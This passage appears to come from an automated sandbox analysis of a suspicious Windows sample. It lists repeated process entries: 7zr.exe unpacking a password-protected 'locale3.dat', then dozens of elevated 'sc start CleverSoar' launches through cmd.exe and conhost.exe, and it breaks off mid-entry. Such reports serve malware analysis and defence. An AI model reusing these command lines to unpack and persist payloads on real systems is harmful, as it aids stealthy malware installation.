                            Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                            Imagebase:0x970000
                            File size:831'200 bytes
                            MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:15
                            Start time:23:03:18
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:16
                            Start time:23:03:18
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:17
                            Start time:23:03:18
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:18
                            Start time:23:03:18
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:19
                            Start time:23:03:18
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:20
                            Start time:23:03:18
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:21
                            Start time:23:03:18
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:22
                            Start time:23:03:18
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:23
                            Start time:23:03:18
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:24
                            Start time:23:03:18
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:25
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:26
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:27
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:28
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:29
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:30
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:31
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:32
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:33
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:34
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:35
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:36
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:37
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:38
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:39
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:40
                            Start time:23:03:19
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:41
                            Start time:23:03:20
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:42
                            Start time:23:03:20
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:43
                            Start time:23:03:20
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:44
                            Start time:23:03:20
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:45
                            Start time:23:03:20
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:46
                            Start time:23:03:20
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:47
                            Start time:23:03:20
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:48
                            Start time:23:03:20
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:49
                            Start time:23:03:20
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:50
                            Start time:23:03:20
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:51
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:53
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:54
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:55
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:56
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:57
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:58
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:59
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:60
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff7403e0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:61
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:62
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:63
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:64
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:65
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:66
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:67
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:68
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:69
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:70
                            Start time:23:03:21
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:71
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:72
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:73
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:74
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:75
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:76
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:77
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:78
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:79
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:80
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:81
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:82
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:83
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:84
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:85
                            Start time:23:03:22
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
